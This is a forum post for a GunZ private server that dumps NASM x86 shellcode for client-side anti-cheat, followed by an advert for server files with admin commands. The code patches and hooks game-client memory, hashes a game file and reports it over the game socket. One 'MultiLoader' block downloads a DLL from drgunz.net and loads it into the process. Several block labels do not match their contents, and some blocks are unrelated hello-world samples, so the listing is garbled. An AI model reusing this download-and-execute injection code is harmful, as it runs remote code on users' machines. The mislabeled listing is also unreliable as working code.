LawnMowerCode:bits 32 %define SOCKET %define HOOK startOfBaseShell: pushad call .jumpTrick .jumpTrick: pop ebp sub ebp, .jumpTrick ; edx: patch location ; ebx: new location lea esi, [ebp + HookTableStart - startOfBaseShell] xor ebx, ebx .loaderLoop: mov eax, [ esi + ebx ] cmp eax, 0 je .doneLoading ; we are going to fork ourself in memory then patch ourself ; save esi because it points to our hook table we are looping through push esi ; memory to allocate to forking ourself. if our code grows beyond this it needs to be increased mov eax, 4096 ; make the call call allocateMemory ; eax has the new locations address ; setup source and destination addresses to make the copy ; ebp points to our base mov esi, ebp ; eax is the return from the allocate call mov edi, eax ; number of bytes is defined as endOfHookTemplate mov ecx, endOfHookTemplate ; copy it rep movsb ; clone ourself to a new location ; esi is restored to poi nter to the global hook table pop esi ; now we need to patch up the loaded template ; save ebx as it is important, it is the row offset in the hook table to access push ebx ; ebx is loaded with the address of the address of the function in gunz patch ; we need this address in our template so the server knows what hack was being used, it doesnt need it ; its more informational then anything mov ebx, [esi + ebx + 0] ; ebx has original address mov [eax + templateReplaceOne + 1], ebx mov [eax + templateReplaceTwo + 1], ebx ; ebx contains row in offset table which is important so restore it pop ebx ; now we need to copy the original bytes of the function we are going to patch from here to the copied template ; save our ever important location to the global hook table push esi ; ecx becomes the length of the original instructions we are going to copy to the template mov ecx, [esi + ebx + 8] ; the instructions are expected to be at the end of the template, so set edi to point to the end of the template in the allocated memory ; and after the instructions should be a call back to patched function mov edi, eax add edi, endOfHookTemplate ; source is located in our awesome hook table definitions mov esi, [esi + ebx + 0x0c] add esi, ebp ; copy over the instructions rep movsb ; restore the pointer to our offset table pop esi ; load ecx with the return address mov ecx, [esi + ebx + 4] ; 0x68 is push constant mov byte [edi], 0x68 inc edi ; return address is written out to the push mov dword [edi], ecx add edi, 4 ; call retn taking off the return address to execute to mov byte [edi], 0xc3 ; the template is now complete. We need to install a hook to it, and tell the server about it. ; edx: patch location ; ebx: new location mov edx, [esi + ebx] push ebx mov ebx, eax add ebx, startOfHookTemplate call installHook xchg ebx, edx ; ebx original location push ecx mov ecx, 8 call sendHookInstalled pop ecx pop ebx add ebx, 4 * 4 jmp .loaderLoop .doneLoading: ; fix the death glitch mov ebx, 0x004B2EC9 mov ecx, 6 call unprotectAddress mov DWORD [ebx], 0x90909090 add ebx, 4 mov WORD [ebx]. 0x9090 sub ebx, 4 call sendHookInstalled ; fix sword slash mov ebx, 0x00475113 mov ecx, 1 call unprotectAddress mov byte [ebx], 0xEB call sendHookInstalled popad mov al, 1 retn reportHacking: pushad call .reportHackingJumpTrick .reportHackingJumpTrick: pop ebp sub ebp, .reportHackingJumpTrick - startOfBaseShell ; edx packet id ; ebx packet data ; ecx packet data length mov [ebp + hackDetectionIdentifier - startOfBaseShell] , eax lea ebx, [ebp+hackDetectionIdentifier-startOfBaseShell] mov edx, 0x10000003 mov ecx, 4 call gunzSendPacket popad retn hookZPostRequestExpelClanMember: PUSH -1 PUSH 0x005D665A MOV EAX,DWORD [fs:0] hookZPostRequestExpelClanMemberEnd: hookZPostRequestStageJoin: PUSH -1 PUSH 0x005D66AE MOV EAX,DWORD [fs:0] hookZPostRequestStageJoinEnd: hookZPostPeerChat: push -1 push 0x005D694A mov eax, dword [fs:0] hookZPostPeerChatEnd: hookZPostChannelChat: push -1 push 0x005D6989 mov eax, dword [fs:0] hookZPostChannelChatEnd: hookZChatOutput: mov eax, 0x4abce0 call eax mov ecx, dword [esp+0x10] hookZChatOutputEnd: hookZPostStageStart: push -1 push 0x5d792d mov eax, dword [fs:0] hookZPostStageStartEnd: hookZPostShotSP: MOV EAX,DWORD [FS:0] PUSH -1 hookZPostShotSPEnd: hookZPostSkill: mov eax, dword [fs:0] push -1 hookZPostSkillEnd: hookZPostShot: PUSH -1 PUSH 0x005D913B MOV EAX,DWORD [FS:0] hookZPostShotEnd: hookZPostShotMelee: mov eax, dword [fs:0] push -1 hookZPostShotMeleeEnd: hookZCharacterSetHP: mov eax, [esp+4] push esi mov esi, ecx xor ecx,ecx hookZCharacterSetHPEnd: hookZPostQuestRequestNPCDead: push -1 push 0x005d950d mov eax, dword [fs:0] hookZPostQuestRequestNPCDeadEnd: hookZGetCharacterManager: mov eax, dword [0x672f68] test eax,eax jnz .return2 .return1: retn .return2: add eax, 0x54 retn hookZGetCharacterManagerEnd: hookZPostGameKill: push -1 push 0x5da14f mov eax, dword [fs:0] hookZPostGameKillEnd: hookZPostRequestSpawn: mov eax, dword [fs:0] push -1 hookZPostRequestSpawnEnd: hookZPostRequestSpawnWorldItem: mov eax, dword [fs:0] push -1 hookZPostRequestSpawnWorldItemEnd: hackDetectionIdentifier: dd 0x0 %include "gunzFunctionAddresses.asm" %include "gunzHookFunctions.asm" ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; HookTableStart: ; ZPostRequestExpelClanMember dd 0x00424F90 dd 0x00424F9D dd hookZPostRequestExpelClanMemberEnd - hookZPostRequestExpelClanMember dd hookZPostRequestExpelClanMember ; ZPostRequestStageJoin dd 0x004257E0 dd 0x004257ED dd hookZPostRequestStageJoinEnd - hookZPostRequestStageJoin dd hookZPostRequestStageJoin ; ZPostPeerChat dd 0x004297F0 dd 0x004297FD dd hookZPostPeerChatEnd - hookZPostPeerChat dd hookZPostPeerChat ; ZPostChannelChat dd 0x004298D0 dd 0x004298DD dd hookZPostChannelChatEnd - hookZPostChannelChat dd hookZPostChannelChat ; ZChatOutput dd 0x0042A230 dd 0x0042A239 ; return address dd hookZChatOutputEnd - hookZChatOutput ; size of original instructions dd hookZChatOutput ; ZPostStageStart dd 0x00448E30 dd 0x00448E3D dd hookZPostStageStartEnd - hookZPostStageStart dd hookZPostStageStart ; ZPostShotSP dd 0x00475C80 dd 0x00475C88 dd hookZPostShotSPEnd - hookZPostShotSP dd hookZPostShotSP ; ZPostSkill dd 0x0047DDA0 dd 0x0047DDA8 dd hookZPostSkillEnd - hookZPostSkill dd hookZPostSkill ; ZPostShot dd 0x0047DF30 dd 0x0047DF3D dd hookZPostShotEnd - hookZPostShot dd hookZPostShot ; ZPostShotMelee dd 0x0047E020 dd 0x0047E028 dd hookZPostShotMeleeEnd - hookZPostShotMelee dd hookZPostShotMelee ; ZCharacterSetHP dd 0x00485D50 dd 0x00485D59 dd hookZCharacterSetHPEnd - hookZCharacterSetHP dd hookZCharacterSetHP ; ZPostQuestRequestNPCDead dd 0x0048A9E0 dd 0x0048A9ED dd hookZPostQuestRequestNPCDeadEnd - hookZPostQuestRequestNPCDead dd hookZPostQuestRequestNPCDead ; ZGetCharacterManager dd 0x0049E870 dd 0x00000000 ; return is fully implemented in code. dd hookZGetCharacterManagerEnd - hookZGetCharacterManager dd hookZGetCharacterManager ; ZPostGameKill dd 0x004A07E0 dd 0x004A07ED dd hookZPostGameKillEnd - hookZPostGameKill dd hookZPostGameKill ; ZPostRequestSpawn dd 0x004B26C0 dd 0x004B26C8 dd hookZPostRequestSpawnEnd - hookZPostRequestSpawn dd hookZPostRequestSpawn ; ZPostRequestSpawnWorldItem dd 0x004B4640 dd 0x004B4648 dd hookZPostRequestSpawnWorldItemEnd - hookZPostRequestSpawnWorldItem dd hookZPostRequestSpawnWorldItem dd 0x0 startOfHookTemplate: pop eax push eax cmp eax, 0x645000 jl checkThreadCaller templateReplaceOne: mov eax, 0x44332211 call reportHacking checkThreadCaller: push ebx templateReplaceTwo: mov ebx, 0x44332211 call checkCallingThread pop ebx originalInstructions: endOfHookTemplate:
loaddllCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb popad mov al,1 retn PatchLocation dd 0x47e020; VirtualProtectAddress dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xffffffb0 PacketAnswer: dd 0x11111111 PacketEnd: CodeToExecute: POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump mov eax, [fs:0] push -1 mov eax, 0x47e028; return jmp JMP eax .deathjump: pushad call nextline5 nextline5: pop eax sub eax, nextline5 - start mov ebp, eax mov eax, [esp + 8] mov [ebp + PacketAnswer], eax mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] popad mov eax, [fs:0] push -1 mov eax, 0x47e028; return jmp JMP eax PatchMeCode: JMP 0x12345678 NOP NOP EndOfPatchMeCode:
MultiLoaderCode:bits 32 startOfShell: pushad call .jumpTrick .jumpTrick: pop ebp sub ebp, .jumpTrick PUSH 0 PUSH 0 PUSH 0 MOV EAX, EBP ADD EAX, threadStart - startOfShell ; start address for thread PUSH EAX PUSH 0 PUSH 0 MOV EAX, DWORD [EBP+(CreateThreadAddress-startOfShell)] ; create thread address CALL DWORD [EAX] ; create the thread POPAD MOV AL,1 ; return but do not delete RETN threadStart: CALL ThreadStartEBPJump ThreadStartEBPJump: POP EBP SUB EBP, ThreadStartEBPJump - startOfShell lea eax, [ebp + DLLLocation] push eax MOV EAX, DWORD [EBP+(DeleteURLCacheEntryAddress-startOfShell)] ; create thread address CALL [EAX] ; create the thread push 0 ; callback push 0 ; dwReserved == 0 lea eax, [ebp + DLLName] push eax lea eax, [ebp + DLLLocation] push eax push 0 MOV EAX, DWORD [EBP+(URLDownloadToFileAddress-startOfShell)] ; create thread address CALL EAX ; create the thread lea eax, [ebp + DLLName] push eax MOV EAX, DWORD [EBP+(LoadLibraryAddress-startOfShell)] CALL DWORD [eax] RETN DataSection: DeleteURLCacheEntryAddress: dd 0x5e6550 CreateThreadAddress: dd 0x5e625c SleepAddress: dd 0x5e6110 LoadLibraryAddress: dd 0x5e6168 URLDownloadToFileAddress: dd 0x583e62 DLLName: db "a.dll",0 DLLLocation: db "http://www.drgunz.net/a.dll",0
Code:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov eax, [ebp + (NumberOfCodes - start)] mov ecx, eax mov eax, startofcodes add eax, ebp sub eax, start mov [ebp + (CurrentPosition - start)], eax looper: cmp ecx, 0 je finishedloadingcodes ; Make sure there are more codes to load push ecx mov eax, [ebp + (CurrentPosition - start)] ; eax points to [4bytesize] + [code x:size] mov ebx, [eax] ; ebx contains size add eax, 4 ; eax points to [code x:size] push eax ; save for after call push 0x40 push 0x3000 push ebx push 0 mov edx, [ ebp + (VirtualAllocAddress - start) ] call [edx] mov edi, eax ; destination is the return value pop eax ; restore saved pointer to [code x:size] mov esi, eax ; source is pointer mov ecx, ebx ; counter contains size of code add eax, ecx ; Update Current Position mov [ebp + (CurrentPosition - start)], eax ; save it out notdone: DEC ECX MOV dl, [ESI+ECX] MOV byte [EDI+ECX],dl JNZ SHORT notdone call edi cmp al, 1 je DontFree PUSH 8000 PUSH 0 PUSH EDI mov edx, [ ebp + (VirtualFreeAddress - start) ] CALL [edx] DontFree: pop ecx ; Restore Number of codes, was used for copy counter. dec ecx jmp looper finishedloadingcodes: popad mov al,0 retn VirtualAllocAddress dd 0x005E62EC VirtualFreeAddress dd 0x005E62F0 CurrentPosition dd 0x00000000 NumberOfCodes dd 0x00000000 startofcodes:
OpiumMPAutoBan
patchlocCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov ebx, ebp add ebx, CodeToExecute.ReturnJumpToPatch1 mov ecx, 0x42a235 sub ecx, ebx sub ecx, 5 mov [ebp +((CodeToExecute.ReturnJumpToPatch1) + 1)], ecx mov ebx, ebp add ebx, RetJump2 mov ecx, 0x42a235 sub ecx, ebx sub ecx, 5 mov [ebp +(RetJump2 + 1)], ecx mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb popad mov al,1 retn PatchLocation dd 0x42a230 VirtualProtectAddress dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xffffffd0 PacketAnswer: dd 0x00000000 PacketEnd: CodeToExecute: pop eax POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump mov eax, 0x4abce0 call eax .ReturnJumpToPatch1: JMP 0x12345678 .deathjump: pushad call nextline5 nextline5: pop eax sub eax, nextline5 - start mov ebp, eax mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] popad mov eax, 0x4abce0 call eax RetJump2: JMP 0x12345678 RETN PatchMeCode: call 0x12345678 EndOfPatchMeCode:
rtnCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb popad mov al,1 retn PatchLocation dd 0x448e30 VirtualProtectAddress dd 0x5e62f4 CodeToExecute: POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump PUSH -1 ; bytes we stole, execute them now... PUSH 0x005D792D mov eax, 0x448e35 ; return jmp JMP eax .deathjump: RETN PatchMeCode: JMP 0x12345678 NOP NOP EndOfPatchMeCode:
SendPacketCode:;NASM Win32 resource sample ; compile and link with ; ;nasm -fobj rtn.asm ; ;alink -oPE rtn win32.lib rtn.res [extern DialogBoxParamA] [extern GetModuleHandleA] [extern ExitProcess] [extern EndDialog] WM_INITDIALOG equ 0110h WM_COMMAND equ 0111h IDOK equ 1 [segment code public use32 class='CODE'] ..start: enter 0,0 push byte 0 call GetModuleHandleA mov [handle],eax push byte 0 push dword DProc push byte 0 push dword string push byte 0 call DialogBoxParamA push dword [handle] call ExitProcess leave ret DProc: %define lparam ebp+20 %define wparam ebp+16 %define msg ebp+12 %define hdlg ebp+8 enter 0,0 mov eax,[msg] cmp eax,WM_INITDIALOG je @@wm_init cmp eax,WM_COMMAND je @@wm_command @@unhandled: xor eax,eax leave ret 16 @@wm_init: mov eax,1 leave ret 16 @@wm_command: cmp dword [wparam],IDOK jne @@unhandled push byte 1 push dword [hdlg] call EndDialog mov eax,1 leave ret 16 [segment data public] handle dd 0 string db 'ABOUTDLG',0
SystemMRSCheckCode:; Send Packet ; ShellCode Designed to get the socket handle used by gunz. ; bits 32 start: pushad call nextline2 nextline2: pop ebp sub ebp, nextline2 - start mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] xor eax, eax popad retn VirtualProtectAddress: dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xffffffff PacketAnswer: dd 0x00000000 PacketEnd:
t2Code:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start ; setup call to createfile a push 0 ; hTemplateFile NULL push 1 ; dwFlagsAndAttributes ReadOnly push 3 ; dwCreationDisposition OpenExisting, fails if non existant push 0 ; lpSecurityAttributes push 7 ; dwShareMode FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE push 0x80000000 ; dwDesireAccess FILE_READ_DATA mov eax, strSystem add eax, ebp sub eax, start push eax ; lpFilename system.mrs mov eax, [ebp+ (CreateFileAAddress - start)] call [eax] mov ebx, ebp add ebx, (SystemMrsHandle - start) mov [ebx], eax ; store opened handle push 0x40 push 0x3000 push 0x1000 push 0 mov edx, [ ebp + (VirtualAllocAddress - start) ] call [edx] ; eax contains address to readfile buffer mov edi, eax ; edi points to allocated buffer readfile: push 0 ; lpOverlapped mov edx, ebp add edx, tempReadCount - start; push edx ; lpNumberOfBytesRead push 0x1000 ; nNumberOfBytesToRead push edi ; buffer of where to store data mov edx, [ebp + (SystemMrsHandle - start)] push edx mov edx, [ ebp + (ReadFileAddress - start)] call [edx] mov eax, [ebp + (tempReadCount - start)]; cmp eax, 0 je endfilecheck computeblockcode: mov ecx, eax mov ebx, [ebp + (tempHashCode - start)] loopthecheck: dec ecx mov dl, byte [edi + ecx] and edx, 0x000000ff add ebx, edx cmp ecx, 0 jne loopthecheck mov [ ebp + (tempHashCode - start)], ebx jmp readfile endfilecheck: mov ebx, [ebp + (tempHashCode-start)] mov [ebp + (PacketAnswer-start)], ebx push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx mov eax, dword [0x203e06b] push eax mov eax, [ebp + (WinsockSend - start)] call [eax] popad mov al,0 retn CreateFileAAddress dd 0x005e6224 ReadFileAddress dd 0x005e627c MessageBoxAAddress dd 0x005e64d0 VirtualAllocAddress dd 0x005E62EC VirtualFreeAddress dd 0x005E62F0 WinsockSend dd 0x005e65c4 SystemMrsHandle dd 0x00000000 tempReadCount dd 0x00000000 tempHashCode dd 0x00000000 strSystem: db 's','y','s','t','e','m','.','m','r','s',0 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xfffffffd PacketAnswer: dd 0x0000000+0 PacketEnd:
tcoffCode:; t2.asm ; assemble with: ; nasm -fobj t2.asm ; ; link with ; alink -oPE t2 ; ; run with ; t2 ; ; expected output is four message boxes. First two say "Hello" in title ; last two say "Bye" in title import start tdll.dll import title1 tdll.dll extern start extern title1 segment code public use32 class=CODE ..start: exestart: call [start] ;display two message boxes ;need to call [start], since start gives address ;of Import Address Table entry, a pointer to routine mov ebx,[title1] ;get address of title1 from IAT mov [ebx],byte 'B' mov [ebx+1],byte 'y' mov [ebx+2],byte 'e' mov [ebx+3],byte 0 call [start] ret
tdllCode:;Sample COFF object file ;assemble with ;NASM -fwin32 tcoff.asm ;link with ;ALINK -oPE tcoff win32.lib -entry main [extern MessageBoxA] [extern __imp_MessageBoxA] [segment .text] [global main] main: push dword 0 ; OK button push dword title1 push dword string1 push dword 0 call MessageBoxA push dword 0 ; OK button push dword title1 push dword string2 push dword 0 call [__imp_MessageBoxA] ret [segment .data] string1: db 'hello world, through redirection',13,10,0 title1: db 'Hello',0 string2: db 'hello world, called through import table',13,10,0
TESTCode:; tdll.asm ; ; assemble with ; nasm -fobj tdll.asm ; ; link with ; alink -oPE -dll tdll win32.lib ; (win32.lib is available from my web page) global start global title1 export start export title1 ;these names are defined in win32.lib as the names of ;a stub proc, and the IAT entry name for MessageBoxA extern MessageBoxA extern __imp_MessageBoxA segment code public use32 class=CODE ;DLL entry point - do nothing, but flag success ;This is a STDCALL entrypoint, so remove 3 params from stack on return ..start: dllstart: mov eax,1 ret 12 ;exported procedure start: push dword 0 ; OK button push dword title1 push dword string1 push dword 0 call MessageBoxA ;call stub routine in win32.lib push dword 0 ; OK button push dword title1 push dword string2 push dword 0 call [__imp_MessageBoxA] ;call routine via IAT ret segment data public use32 class=DATA string1: db 'hello world, through redirection',13,10,0 ;exported data title1: db 'Hello',0 string2: db 'hello world, called through import table',13,10,0
ZPostShotSPAutoBanCode:ideal p386 model use32 flat includelib "win32.lib" extrn MessageBoxA:near extrn __imp_MessageBoxA:dword codeseg start: push 0 ; OK button push offset title1 push offset string1 push 0 call MessageBoxA push 0 ; OK button push offset title1 push offset string2 push 0 call large [large __imp_MessageBoxA] ret dataseg string1: db 'hello world, through redirection',13,10,0 title1: db 'Hello',0 string2: db 'hello world, called through import table',13,10,0 end start
ZPostSpanAutoBanCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb popad mov al,1 retn PatchLocation dd 0x475C80; VirtualProtectAddress dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xfffffffc PacketAnswer: dd 0x00000000 PacketEnd: CodeToExecute: POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump mov eax, [fs:0] push -1 mov eax, 0x475C88 ; return jmp JMP eax .deathjump: pushad call nextline5 nextline5: pop eax sub eax, nextline5 - start mov ebp, eax mov eax, [esp + 8] mov [ebp + PacketAnswer], eax mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] popad push -1 push 0x0056792d mov eax, 0x475C88 jmp eax RETN PatchMeCode: JMP 0x12345678 NOP NOP EndOfPatchMeCode:
creditsCode:;PatchLocation ; Originally made to patch MPLVL.txt dll by brian. bits 32 start: pushad call getlocation getlocation: pop ebp sub ebp, getlocation-start mov ebx, [ebp+ (PatchLocation - start)] ; ebx contains the location of the where the patch will be placed mov ecx, ebp sub ecx, ebx add ecx, (CodeToExecute - start - 5) ; ecx has the jump position mov [ebp + ((PatchMeCode-start) + 1)], ecx ; fix the jump push ebp push 0x40 push EndOfPatchMeCode - PatchMeCode push ebx mov eax, [ebp+ (VirtualProtectAddress - start)] call [eax] mov esi, ebp add esi, PatchMeCode - start mov edi, [ebp+ (PatchLocation - start)] mov ecx, EndOfPatchMeCode - PatchMeCode rep movsb popad mov al,1 retn PatchLocation dd 0x4b26c0 VirtualProtectAddress dd 0x5e62f4 WinsockSend: dd 0x5e65c4 PacketStart: dw 0x66 PacketSize: dw PacketEnd-PacketStart PacketID: dd 0xfffffffd PacketAnswer: dd 0x00000000 PacketEnd: CodeToExecute: POP EAX PUSH EAX CMP EAX, 0x00645000 JGE SHORT .deathjump mov eax, [fs:0] push -1 mov eax, 0x4b26c8 ; return jmp JMP eax .deathjump: pushad call nextline5 nextline5: pop eax sub eax, nextline5 - start mov ebp, eax mov eax, [esp + 8] mov [ebp + PacketAnswer], eax mov eax, dword [0x203e06b] push 0 push PacketEnd-PacketStart mov ebx, ebp add ebx, PacketStart push ebx push eax mov eax, [ebp + WinsockSend] call [eax] popad push -1 push 0x0056792d mov eax, 0x4b26c8 jmp eax RETN PatchMeCode: JMP 0x12345678 NOP NOP EndOfPatchMeCode:
From brian , www.drgunz.net
you want have the full fix of server files?
( ProGunzSoul A.k.A TheOne ) Email :: progunzsoul@hotmail.com
server file&client 2005 ~ 2010
Server files 2008 editing in 2010
* Auto Ban
* repacks of old files of (dr)
* tool's to add command's without using asm
* Anti kore
* Anti hack
* Request command's /re_admin <charatername>
it's will show
charatername , lvl , sex , exp , upgrade
* sit upgrade ingame with command /up_af_upgrade (0-255) <charatername>
* command /kill <charatername>
* Restarting server for upgrade owner : 256 this new upgrade will be update with using mssql 2008 , /re_admin 5 (warning don't let it 4?) or the server will crash
* banned command /bn_admin <charatername>
* clean afkers? /cl_af_ar
* clean lagers? ping overs 1,000 will have d/c ! /dcp_1000
and more !
edit !
* Coming Soon Release Server Files create in 29/10/2010
Please no comment's
Originally Posted by Asaki
